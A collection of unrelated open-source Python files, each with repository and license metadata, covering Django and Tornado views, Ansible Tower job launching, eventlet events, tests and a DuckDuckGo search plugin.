any_input (bool): Whether to return default value regardless of input.
Returns:
bool: True or False, based on user's input.
"""
if default_yes:
choice = '[Y/n]'
else:
choice = '[y/N]'
if any_input:
msg = '{0} '.format(message)
else:
msg = '{0} {1}? '.format(message, choice)
while True:
user_input = input(msg).lower()
if not user_input or any_input:
return True if default_yes else False
try:
user_input = cls.strtobool(user_input)
except ValueError:
logger.error('You have to type y(es) or n(o).')
continue
if any_input:
return True
else:
return bool(user_input)
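A minimal usage sketch for the helper above (illustrative only; the prompt text is made up and the import path mirrors this file's location):

# hypothetical usage, not part of the original module
from rebasehelper.helpers.input_helper import InputHelper

if InputHelper.get_message('Apply the downstream patch', default_yes=True):
    print('applying')   # user typed y/yes/t/true/on/1, or pressed Enter for the default
else:
    print('skipping')   # user typed n/no/f/false/off/0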
|
rebase-helper/rebase-helper
|
rebasehelper/helpers/input_helper.py
|
Python
|
gpl-2.0
| 3,222
| 0.000622
|
#!/usr/bin/env python
#coding=utf8
import datetime
import logging
from handler import UserBaseHandler
from lib.route import route
from lib.util import vmobile
@route(r'/user', name='user') # user backend home page
class UserHandler(UserBaseHandler):
def get(self):
user = self.get_current_user()
try:
self.session['user'] = user
self.session.save()
except:
pass
self.render('user/index.html')
@route(r'/user/profile', name='user_profile') # user profile
class ProfileHandler(UserBaseHandler):
def get(self):
self.render('user/profile.html')
def post(self):
self.redirect('/user/profile')
|
ptphp/PtPy
|
pttornado/src/handler/user.py
|
Python
|
bsd-3-clause
| 712
| 0.018786
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetGlossary
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-translate
# [START translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from google.cloud import translate_v3beta1
def sample_get_glossary():
# Create a client
client = translate_v3beta1.TranslationServiceClient()
# Initialize request argument(s)
request = translate_v3beta1.GetGlossaryRequest(
name="name_value",
)
# Make the request
response = client.get_glossary(request=request)
# Handle the response
print(response)
# [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
|
googleapis/python-translate
|
samples/generated_samples/translate_v3beta1_generated_translation_service_get_glossary_sync.py
|
Python
|
apache-2.0
| 1,480
| 0.000676
|
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase
class EncodeTests(TwillTestCase):
def test_00_first(self): # will run first due to its name
"""3B_GetEncodeData: Clearing history"""
self.clear_history()
def test_10_Encode_Data(self):
"""3B_GetEncodeData: Getting encode data"""
self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
# hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
self.wait()
self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
# self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
# self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
# self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
# self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
# self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
|
jmchilton/galaxy-central
|
galaxy/test/functional/test_3B_GetEncodeData.py
|
Python
|
mit
| 1,185
| 0.01097
|
from django.conf.urls import url
from django.contrib.auth.views import login, \
logout, \
logout_then_login, \
password_change, \
password_change_done, \
password_reset, \
password_reset_done, \
password_reset_confirm, \
password_reset_complete
from . import views
urlpatterns = [
url(r'^$', views.dashboard, name='dashboard'),
# login / logout urls
url(r'^login/$', view=login, name='login'),
url(r'^logout/$', view=logout, name='logout'),
url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'),
# change password urls
url(r'^password-change/$', view=password_change, name='password_change'),
url(r'^password-change/done/$', view=password_change_done, name='password_change_done'),
# restore password urls
url(r'^password-reset/$', view=password_reset, name='password_reset'),
url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'),
url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'),
url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'),
]
|
t104801/webapp
|
security/urls.py
|
Python
|
gpl-3.0
| 1,479
| 0.004057
|
from lacuna.building import MyBuilding
class fission(MyBuilding):
path = 'fission'
def __init__( self, client, body_id:int = 0, building_id:int = 0 ):
super().__init__( client, body_id, building_id )
|
tmtowtdi/MontyLacuna
|
lib/lacuna/buildings/boring/fission.py
|
Python
|
mit
| 219
| 0.031963
|
import unittest
from nose.tools import assert_equals
from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable
from robotide.controller.filecontrollers import TestCaseFileController
from robotide.controller.tablecontrollers import ImportSettingsController
VALID_NAME = 'Valid name'
class TestCaseNameValidationTest(unittest.TestCase):
def setUp(self):
self.ctrl = TestCaseFileController(TestCaseFile()).tests
def test_valid_name(self):
self._validate_name(VALID_NAME, True)
def test_empty_name(self):
self._validate_name('', False)
def test_name_with_only_whitespace(self):
self._validate_name(' ', False)
def test_duplicate_name(self):
self.ctrl.new(VALID_NAME)
self._validate_name(VALID_NAME, False)
self._validate_name(VALID_NAME.upper(), False)
self._validate_name(VALID_NAME.replace(' ', '_'), False)
def test_duplicate_name_when_previous_name_known(self):
ctrl = self.ctrl.new(VALID_NAME)
self._validate_name(VALID_NAME, True, ctrl)
self._validate_name(VALID_NAME.upper(), True, ctrl)
self._validate_name(VALID_NAME.replace(' ', '_'), True, ctrl)
def _validate_name(self, name, expected_valid, named_ctrl=None):
valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message)
assert_equals(valid, expected_valid)
class TestCaseCreationTest(unittest.TestCase):
def setUp(self):
self.ctrl = TestCaseFileController(TestCaseFile()).tests
def test_whitespace_is_stripped(self):
test = self.ctrl.new(' ' + VALID_NAME + '\t \n')
assert_equals(test.name, VALID_NAME)
class LibraryImportListOperationsTest(unittest.TestCase):
def setUp(self):
self._parent = lambda:0
self._parent.mark_dirty = lambda:0
self._parent.datafile_controller = self._parent
self._parent.update_namespace = lambda:0
self._table = TestCaseFileSettingTable(lambda:0)
self.ctrl = ImportSettingsController(self._parent, self._table)
self._lib1 = self.ctrl.add_library('libbi1', '', '')
self._lib2 = self.ctrl.add_library('libbi2', '', '')
self.assertEqual([self._lib1.name, self._lib2.name], [l.name for l in self.ctrl])
def test_move_up(self):
self.ctrl.move_up(1)
self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
def test_move_down(self):
self.ctrl.move_down(0)
self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
|
fingeronthebutton/RIDE
|
utest/controller/test_tablecontrollers.py
|
Python
|
apache-2.0
| 2,586
| 0.004254
|
#!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_job_launch
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: Launch an Ansible Job.
description:
- Launch an Ansible Tower job. See
U(https://www.ansible.com/tower) for an overview.
options:
job_template:
description:
- Name of the job_template to use.
required: True
job_explanation:
description:
- Job explanation field.
default: null
job_type:
description:
- Job_type to use for the job, only used if prompt for job_type is set.
choices: ["run", "check", "scan"]
default: null
inventory:
description:
- Inventory to use for the job, only used if prompt for inventory is set.
default: null
credential:
description:
- Credential to use for job, only used if prompt for credential is set.
default: null
extra_vars:
description:
- Extra_vars to use for the job_template. Use '@' for a file.
default: null
limit:
description:
- Limit to use for the job_template.
default: null
tags:
description:
- Specific tags to use for from playbook.
default: null
use_job_endpoint:
description:
- Disable launching jobs from job template.
default: False
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Launch a job
tower_job_launch:
job_template: "My Job Template"
register: job
- name: Wait for job max 120s
tower_job_wait:
job_id: "{{ job.id }}"
timeout: 120
'''
RETURN = '''
id:
description: job id of the newly launched job
returned: success
type: int
sample: 86
status:
description: status of newly launched job
returned: success
type: string
sample: pending
'''
from ansible.module_utils.basic import AnsibleModule
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
from ansible.module_utils.ansible_tower import (
tower_auth_config,
tower_check_mode,
tower_argument_spec,
)
HAS_TOWER_CLI = True
except ImportError:
HAS_TOWER_CLI = False
def main():
argument_spec = tower_argument_spec()
argument_spec.update(dict(
job_template=dict(required=True),
job_type=dict(choices=['run', 'check', 'scan']),
inventory=dict(),
credential=dict(),
limit=dict(),
tags=dict(type='list'),
extra_vars=dict(type='list'),
))
module = AnsibleModule(
argument_spec,
supports_check_mode=True
)
if not HAS_TOWER_CLI:
module.fail_json(msg='ansible-tower-cli required for this module')
json_output = {}
tags = module.params.get('tags')
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
try:
params = module.params.copy()
if isinstance(tags, list):
params['tags'] = ','.join(tags)
job = tower_cli.get_resource('job')
lookup_fields = ('job_template', 'inventory', 'credential')
for field in lookup_fields:
try:
name = params.pop(field)
result = tower_cli.get_resource(field).get(name=name)
params[field] = result['id']
except exc.NotFound as excinfo:
module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False)
result = job.launch(no_input=True, **params)
json_output['id'] = result['id']
json_output['status'] = result['status']
except (exc.ConnectionError, exc.BadRequest) as excinfo:
module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main()
|
HuaweiSwitch/ansible
|
lib/ansible/modules/web_infrastructure/ansible_tower/tower_job_launch.py
|
Python
|
gpl-3.0
| 4,901
| 0.000816
|
# coding: utf-8
from django.views.generic import CreateView, UpdateView, DeleteView
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
from django.template import RequestContext
from django.core.serializers.json import DjangoJSONEncoder
from django.conf import settings
try:
import json
except ImportError:
from django.utils import simplejson as json
class JSONResponseMixin(object):
"""
This is a slightly modified version from django-braces project
(https://github.com/brack3t/django-braces)
"""
content_type = None
json_dumps_kwargs = None
def get_content_type(self):
return self.content_type or u"application/json"
def get_json_dumps_kwargs(self):
if self.json_dumps_kwargs is None:
self.json_dumps_kwargs = {}
self.json_dumps_kwargs.setdefault(u'ensure_ascii', False)
return self.json_dumps_kwargs
def render_json_response(self, context_dict, status=200):
"""
Limited serialization for shipping plain data. Do not use for models
or other complex or custom objects.
"""
json_context = json.dumps(
context_dict,
cls=DjangoJSONEncoder,
**self.get_json_dumps_kwargs()
).encode(u'utf-8')
return HttpResponse(
json_context,
content_type=self.get_content_type(),
status=status
)
class AjaxFormMixin(JSONResponseMixin):
message_template = None
def pre_save(self):
pass
def post_save(self):
pass
def form_valid(self, form):
"""
If the request is ajax, save the form and return a json response.
Otherwise return super as expected.
"""
self.object = form.save(commit=False)
self.pre_save()
self.object.save()
if hasattr(form, 'save_m2m'):
form.save_m2m()
self.post_save()
if self.request.is_ajax():
return self.render_json_response(self.get_success_result())
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
"""
We have errors in the form. If ajax, return them as json.
Otherwise, proceed as normal.
"""
if self.request.is_ajax():
return self.render_json_response(self.get_error_result(form))
return super(AjaxFormMixin, self).form_invalid(form)
def get_message_template_context(self):
return {
'instance': self.object,
'object': self.object
}
def get_message_template_html(self):
return render_to_string(
self.message_template,
self.get_message_template_context(),
context_instance=RequestContext(self.request)
)
def get_response_message(self):
message = ''
if self.message_template:
message = self.get_message_template_html()
return message
def get_success_result(self):
return {'status': 'ok', 'message': self.get_response_message()}
def get_error_result(self, form):
html = render_to_string(
self.template_name,
self.get_context_data(form=form),
context_instance=RequestContext(self.request)
)
return {'status': 'error', 'message': html}
DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html")
class AjaxCreateView(AjaxFormMixin, CreateView):
template_name = DEFAULT_FORM_TEMPLATE
class AjaxUpdateView(AjaxFormMixin, UpdateView):
template_name = DEFAULT_FORM_TEMPLATE
class AjaxDeleteView(JSONResponseMixin, DeleteView):
def pre_delete(self):
pass
def post_delete(self):
pass
def get_success_result(self):
return {'status': 'ok'}
def delete(self, request, *args, **kwargs):
"""
The same logic as in DeleteView, but with some hooks and
a JSON response in case of an AJAX request.
"""
self.object = self.get_object()
self.pre_delete()
self.object.delete()
self.post_delete()
if self.request.is_ajax():
return self.render_json_response(self.get_success_result())
success_url = self.get_success_url()
return HttpResponseRedirect(success_url)
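A minimal usage sketch for the mixins above (hypothetical model and template names; URL and form wiring omitted):

# hypothetical usage, not part of the original module
from fm.views import AjaxCreateView
from myapp.models import Task  # hypothetical model

class TaskCreateView(AjaxCreateView):
    model = Task
    fields = ['title']
    message_template = 'myapp/task_created.html'  # rendered into the JSON "message" on success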
|
kobox/achilles.pl
|
src/static/fm/views.py
|
Python
|
mit
| 4,377
| 0.000457
|
from django.apps import AppConfig
class IndexConfig(AppConfig):
name = 'web.index'
|
LoRexxar/Cobra-W
|
web/index/apps.py
|
Python
|
mit
| 89
| 0
|
import pandas as pd
from requests import get
from StringIO import StringIO
from pandas.io.common import ZipFile
def get_movielens_data(local_file=None, get_genres=False):
'''Downloads movielens data and stores it in pandas dataframe.
'''
if not local_file:
#print 'Downloading data...'
zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip'
zip_response = get(zip_file_url)
zip_contents = StringIO(zip_response.content)
#print 'Done.'
else:
zip_contents = local_file
#print 'Loading data into memory...'
with ZipFile(zip_contents) as zfile:
zip_files = pd.Series(zfile.namelist())
zip_file = zip_files[zip_files.str.contains('ratings')].iat[0]
zdata = zfile.read(zip_file)
if 'latest' in zip_file:
header = 0
else:
header = None
delimiter = ','
zdata = zdata.replace('::', delimiter) # makes data compatible with pandas c-engine
ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c',
names=['userid', 'movieid', 'rating', 'timestamp'],
usecols=['userid', 'movieid', 'rating'])
if get_genres:
zip_file = zip_files[zip_files.str.contains('movies')].iat[0]
with zfile.open(zip_file) as zdata:
if 'latest' in zip_file:
delimiter = ','
else:
delimiter = '::'
genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python',
names=['movieid', 'movienm', 'genres'])
ml_genres = split_genres(genres_data)
ml_data = (ml_data, ml_genres)
return ml_data
def split_genres(genres_data):
genres_data.index.name = 'movie_idx'
genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid')
ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True)
return ml_genres
def filter_short_head(data, threshold=0.01):
short_head = data.groupby('movieid', sort=False)['userid'].nunique()
short_head.sort_values(ascending=False, inplace=True)
ratings_perc = short_head.cumsum()*1.0/short_head.sum()
movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head)
long_tail_movies = ratings_perc[movies_perc > threshold].index
return long_tail_movies
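A brief usage sketch for the loader above (Python 2, like the module itself; the call downloads the ML-1M archive unless local_file points to a local copy):

# hypothetical usage, not part of the original module
from polara.tools.movielens import get_movielens_data

ratings, genres = get_movielens_data(get_genres=True)  # returns a (ratings, genres) tuple
print ratings.columns.tolist()  # ['userid', 'movieid', 'rating']
print genres.columns.tolist()   # ['movieid', 'movienm', 'genreid']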
|
Evfro/fifty-shades
|
polara/tools/movielens.py
|
Python
|
mit
| 2,538
| 0.006304
|
"""
Copyright (c) 2015 Michael Bright and Bamboo HR LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flask import Response
from rapid.lib.version import Version
from rapid.lib import api_key_required
from rapid.lib.utils import UpgradeUtil
class UpgradeController(object):
def __init__(self, flask_app):
self.flask_app = flask_app
def configure_routing(self):
self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST'])
def upgrade_master(self, version):
worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config)
return Response("It worked!" if worked else "It didn't work, version {} restored!".format(Version.get_version()), status=200 if worked else 505)
|
BambooHR/rapid
|
rapid/master/controllers/api/upgrade_controller.py
|
Python
|
apache-2.0
| 1,295
| 0.002317
|
#!/usr/local/bin/python3
import cgi
print("Content-type: text/html")
print('''
<!DOCTYPE html>
<html>
<head>
<title>Python</title>
</head>
<body>
<h1>Python</h1>
<p>Python</p>
<p>This is the article for Python</p>
</body>
</html>
''')
|
Secretmapper/updevcamp-session-2-dist
|
form/cgi-bin/lectures/simple/python.py
|
Python
|
mit
| 272
| 0
|
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
from unittest import mock
from oslotest import base as test_base
from oslo_service import systemd
class SystemdTestCase(test_base.BaseTestCase):
"""Test case for Systemd service readiness."""
def test__abstractify(self):
sock_name = '@fake_socket'
res = systemd._abstractify(sock_name)
self.assertEqual('\0{0}'.format(sock_name[1:]), res)
@mock.patch.object(os, 'getenv', return_value='@fake_socket')
def _test__sd_notify(self, getenv_mock, unset_env=False):
self.ready = False
self.closed = False
class FakeSocket(object):
def __init__(self, family, type):
pass
def connect(fs, socket):
pass
def close(fs):
self.closed = True
def sendall(fs, data):
if data == b'READY=1':
self.ready = True
with mock.patch.object(socket, 'socket', new=FakeSocket):
if unset_env:
systemd.notify_once()
else:
systemd.notify()
self.assertTrue(self.ready)
self.assertTrue(self.closed)
def test_notify(self):
self._test__sd_notify()
def test_notify_once(self):
os.environ['NOTIFY_SOCKET'] = '@fake_socket'
self._test__sd_notify(unset_env=True)
self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET')
@mock.patch("socket.socket")
def test_onready(self, sock_mock):
recv_results = [b'READY=1', '', socket.timeout]
expected_results = [0, 1, 2]
for recv, expected in zip(recv_results, expected_results):
if recv == socket.timeout:
sock_mock.return_value.recv.side_effect = recv
else:
sock_mock.return_value.recv.return_value = recv
actual = systemd.onready('@fake_socket', 1)
self.assertEqual(expected, actual)
|
openstack/oslo.service
|
oslo_service/tests/test_systemd.py
|
Python
|
apache-2.0
| 2,580
| 0
|
from __future__ import print_function
from eventlet import hubs
from eventlet.support import greenlets as greenlet
__all__ = ['Event']
class NOT_USED:
def __repr__(self):
return 'NOT_USED'
NOT_USED = NOT_USED()
class Event(object):
"""An abstraction where an arbitrary number of coroutines
can wait for one event from another.
Events are similar to a Queue that can only hold one item, but differ
in two important ways:
1. calling :meth:`send` never unschedules the current greenthread
2. :meth:`send` can only be called once; create a new event to send again.
They are good for communicating results between coroutines, and
are the basis for how
:meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>`
is implemented.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def baz(b):
... evt.send(b + 1)
...
>>> _ = eventlet.spawn_n(baz, 3)
>>> evt.wait()
4
"""
_result = None
_exc = None
def __init__(self):
self._waiters = set()
self.reset()
def __str__(self):
params = (self.__class__.__name__, hex(id(self)),
self._result, self._exc, len(self._waiters))
return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params
def reset(self):
# this is kind of a misfeature and doesn't work perfectly well,
# it's better to create a new event rather than reset an old one
# removing documentation so that we don't get new use cases for it
assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.'
self._result = NOT_USED
self._exc = None
def ready(self):
""" Return true if the :meth:`wait` call will return immediately.
Used to avoid waiting for things that might take a while to time out.
For example, you can put a bunch of events into a list, and then visit
them all repeatedly, calling :meth:`ready` until one returns ``True``,
and then you can :meth:`wait` on that one."""
return self._result is not NOT_USED
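# Illustrative sketch of the polling pattern described above (not part of the
# original module): collect events in a list and poll ready() until one fires.
#
#   events = [event.Event() for _ in range(3)]
#   while not any(e.ready() for e in events):
#       eventlet.sleep(0.1)
#   result = next(e for e in events if e.ready()).wait()  # returns immediately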
def has_exception(self):
return self._exc is not None
def has_result(self):
return self._result is not NOT_USED and self._exc is None
def poll(self, notready=None):
if self.ready():
return self.wait()
return notready
# QQQ make it return tuple (type, value, tb) instead of raising
# because
# 1) "poll" does not imply raising
# 2) it's better not to screw up caller's sys.exc_info() by default
    # (e.g. if caller wants to call the function in except or finally)
def poll_exception(self, notready=None):
if self.has_exception():
return self.wait()
return notready
def poll_result(self, notready=None):
if self.has_result():
return self.wait()
return notready
def wait(self):
"""Wait until another coroutine calls :meth:`send`.
Returns the value the other coroutine passed to
:meth:`send`.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def wait_on():
... retval = evt.wait()
... print("waited for {0}".format(retval))
>>> _ = eventlet.spawn(wait_on)
>>> evt.send('result')
>>> eventlet.sleep(0)
waited for result
Returns immediately if the event has already
        occurred.
>>> evt.wait()
'result'
"""
current = greenlet.getcurrent()
if self._result is NOT_USED:
self._waiters.add(current)
try:
return hubs.get_hub().switch()
finally:
self._waiters.discard(current)
if self._exc is not None:
current.throw(*self._exc)
return self._result
def send(self, result=None, exc=None):
"""Makes arrangements for the waiters to be woken with the
result and then returns immediately to the parent.
>>> from eventlet import event
>>> import eventlet
>>> evt = event.Event()
>>> def waiter():
... print('about to wait')
... result = evt.wait()
... print('waited for {0}'.format(result))
>>> _ = eventlet.spawn(waiter)
>>> eventlet.sleep(0)
about to wait
>>> evt.send('a')
>>> eventlet.sleep(0)
waited for a
It is an error to call :meth:`send` multiple times on the same event.
>>> evt.send('whoops')
Traceback (most recent call last):
...
AssertionError: Trying to re-send() an already-triggered event.
        Use :meth:`reset` between calls to :meth:`send` to reuse an event object.
"""
assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.'
self._result = result
if exc is not None and not isinstance(exc, tuple):
exc = (exc, )
self._exc = exc
hub = hubs.get_hub()
for waiter in self._waiters:
hub.schedule_call_global(
0, self._do_send, self._result, self._exc, waiter)
def _do_send(self, result, exc, waiter):
if waiter in self._waiters:
if exc is None:
waiter.switch(result)
else:
waiter.throw(*exc)
def send_exception(self, *args):
"""Same as :meth:`send`, but sends an exception to waiters.
The arguments to send_exception are the same as the arguments
to ``raise``. If a single exception object is passed in, it
will be re-raised when :meth:`wait` is called, generating a
new stacktrace.
>>> from eventlet import event
>>> evt = event.Event()
>>> evt.send_exception(RuntimeError())
>>> evt.wait()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "eventlet/event.py", line 120, in wait
current.throw(*self._exc)
RuntimeError
If it's important to preserve the entire original stack trace,
you must pass in the entire :func:`sys.exc_info` tuple.
>>> import sys
>>> evt = event.Event()
>>> try:
... raise RuntimeError()
... except RuntimeError:
... evt.send_exception(*sys.exc_info())
...
>>> evt.wait()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "eventlet/event.py", line 120, in wait
current.throw(*self._exc)
File "<stdin>", line 2, in <module>
RuntimeError
Note that doing so stores a traceback object directly on the
Event object, which may cause reference cycles. See the
:func:`sys.exc_info` documentation.
"""
        # the arguments are the same as for greenlet.throw
return self.send(None, args)
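# --- Illustrative usage sketch (not part of the original module) ---
# The docstrings above show a single waiter; this demonstrates the
# "arbitrary number of coroutines" case: every greenthread blocked in
# wait() is woken by the single send() and receives the same value.
if __name__ == '__main__':
    import eventlet

    evt = Event()

    def waiter(n):
        print('waiter %d got %r' % (n, evt.wait()))

    threads = [eventlet.spawn(waiter, n) for n in range(3)]
    evt.send('done')
    for t in threads:
        t.wait()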
|
sbadia/pkg-python-eventlet
|
eventlet/event.py
|
Python
|
mit
| 7,095
| 0.000423
|
from canvas.exceptions import ServiceError, ValidationError
from canvas.economy import InvalidPurchase
from drawquest import knobs
from drawquest.apps.palettes.models import get_palette_by_name, all_palettes
from drawquest.signals import balance_changed
def balance(user):
return int(user.kv.stickers.currency.get() or 0)
def _adjust_balance(user, amount):
if amount >= 0:
user.kv.stickers.currency.increment(amount)
else:
result = user.kv.stickers.currency.increment_ifsufficient(amount)
if not result['success']:
raise InvalidPurchase("Insufficient balance.")
balance_changed.send(None, user=user)
publish_balance(user)
def publish_balance(user):
user.redis.coin_channel.publish({'balance': balance(user)})
def credit(user, amount):
_adjust_balance(user, amount)
def debit(user, amount):
_adjust_balance(user, -amount)
def credit_first_quest(user):
credit(user, knobs.REWARDS['first_quest'])
def credit_quest_of_the_day_completion(user):
credit(user, knobs.REWARDS['quest_of_the_day'])
def credit_archived_quest_completion(user):
credit(user, knobs.REWARDS['archived_quest'])
def credit_personal_share(user):
credit(user, knobs.REWARDS['personal_share'])
def credit_streak(user, streak):
credit(user, knobs.REWARDS['streak_{}'.format(streak)])
def credit_star(user):
user.kv.stickers_received.increment(1)
credit(user, knobs.REWARDS['star'])
def purchase_palette(user, palette):
if isinstance(palette, basestring):
        palette = get_palette_by_name(palette)
if palette in user.redis.palettes:
raise InvalidPurchase("You've already bought this palette.")
debit(user, palette.cost)
user.redis.palettes.unlock(palette)
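# --- Illustrative sketch (not part of the original module) ---
# _adjust_balance() relies on an atomic "increment if sufficient" primitive,
# so two concurrent debits cannot both succeed on the same coins. A minimal
# in-memory stand-in for that primitive, assuming a plain dict as the store:
def _increment_ifsufficient(store, key, amount):
    # apply the delta only if the balance stays non-negative, and report
    # whether it was applied -- mirroring the contract used above
    current = store.get(key, 0)
    if current + amount < 0:
        return {'success': False, 'remaining': current}
    store[key] = current + amount
    return {'success': True, 'remaining': store[key]}
# e.g. _increment_ifsufficient({'coins': 5}, 'coins', -10)
#      -> {'success': False, 'remaining': 5}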
|
canvasnetworks/canvas
|
website/drawquest/economy.py
|
Python
|
bsd-3-clause
| 1,765
| 0.007365
|
#
# Copyright (C) 2010 Cardapio Team (tvst@hotmail.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
## Duck Duck Go search plugin by Clifton Mulkey
## Adapted from the Google Search plugin
class CardapioPlugin(CardapioPluginInterface):
author = _('Cardapio Team')
name = _('DuckDuckGo')
description = _('Perform quick DuckDuckGo searches')
url = ''
help_text = ''
version = '1.0'
plugin_api_version = 1.40
search_delay_type = 'remote'
default_keyword = 'duck'
category_name = _('DuckDuckGo Results')
category_icon = 'system-search'
icon = 'system-search'
category_tooltip = _('Results found with DuckDuckGo')
hide_from_sidebar = True
def __init__(self, cardapio_proxy, category):
self.c = cardapio_proxy
try:
from gio import File, Cancellable
from urllib2 import quote
from simplejson import loads
from locale import getdefaultlocale
from glib import GError
except Exception, exception:
self.c.write_to_log(self, 'Could not import certain modules', is_error=True)
self.c.write_to_log(self, exception, is_error=True)
self.loaded = False
return
self.File = File
self.Cancellable = Cancellable
self.quote = quote
self.loads = loads
self.getdefaultlocale = getdefaultlocale
self.GError = GError
self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json'
self.search_controller = self.Cancellable()
self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'"
self.action = {
'name': _('Show additional results'),
'tooltip': _('Show additional search results in your web browser'),
'icon name': 'system-search',
'type': 'callback',
'command': self.more_results_action,
'context menu': None,
}
self.loaded = True
def search(self, text, result_limit):
# TODO: I'm sure this is not the best way of doing remote procedure
# calls, but I can't seem to find anything that is this easy to use and
# compatible with gtk. Argh :(
# TODO: we should really check if there's an internet connection before
# proceeding...
self.current_query = text
text = self.quote(str(text))
# Is there a way to get the result_limit in the init method
        # so we don't have to assign it every time search is called?
self.result_limit = result_limit
query = self.query_url.format(text)
self.stream = self.File(query)
self.search_controller.reset()
self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller)
def cancel(self):
if not self.search_controller.is_cancelled():
self.search_controller.cancel()
